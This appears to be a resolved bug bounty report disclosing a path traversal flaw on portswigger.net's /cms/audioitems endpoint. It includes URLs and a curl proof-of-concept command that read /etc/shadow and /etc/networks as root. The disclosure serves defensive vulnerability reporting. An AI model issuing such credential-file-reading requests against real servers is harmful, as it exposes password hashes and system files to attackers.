[portswigger.net] Path Traversal al /cms/audioitems
High
P
PortSwigger Web Security
Submitted None
Actions:
Reported by
0xd0m7
Vulnerability Details
Technical details and impact analysis
Prelude.
I wasn't going to report it, I thought it was your laboratory but after my first analysis this seems real.
**Description**
It's detected a path traversal as root user that allows to remote attackers see internal files as root.
`https://portswigger.net/cms/audioitems//etc/networks`
`https://portswigger.net/cms/audioitems//etc/shadow`
**Poc**
`curl -kis "https://portswigger.net/cms/audioitems//etc/shadow"`
{F3132191}
## Impact
Abilit to read internal files as root
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Path Traversal